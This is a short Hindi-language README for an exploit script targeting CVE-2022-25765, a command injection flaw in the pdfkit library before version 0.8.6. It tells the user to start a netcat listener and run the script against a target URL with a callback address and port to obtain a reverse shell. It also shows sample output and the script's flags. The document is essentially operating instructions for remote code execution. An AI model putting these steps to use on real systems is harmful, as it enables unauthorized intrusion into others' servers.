
pdfkit < 0.8.6 में CVE-2022-25765 कमांड इंजेक्शन के लिए एक्सप्लॉइट
CVE-2022-25765 कमांड इंजेक्शन का शोषण pdfkit < 0.8.6 में
इस भेद्यता के बारे में अधिक जानकारी यहाँ देखें।
अपने होस्ट पर नेटकैट चलाएँ:
$ nc -lvnp 1337
शोषण चलाएँ (उदाहरण):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] लक्ष्य पता दर्ज किया गया है http://localhost
[*] रिवर्स कनेक्ट के लिए पता दर्ज किया गया है 10.10.14.122
[*] पोर्ट दर्ज किया गया है 1337
[!] शेल चलाएँ... सफल कनेक्शन के बाद Ctrl+C दबाएँ
फ़्लैग:
-t, --target http-प्रारूप में लक्ष्य का पता
-a, --addr रिवर्स कनेक्ट के लिए पता
-p, --port रिवर्स कनेक्ट के लिए पोर्ट, डिफ़ॉल्ट 9001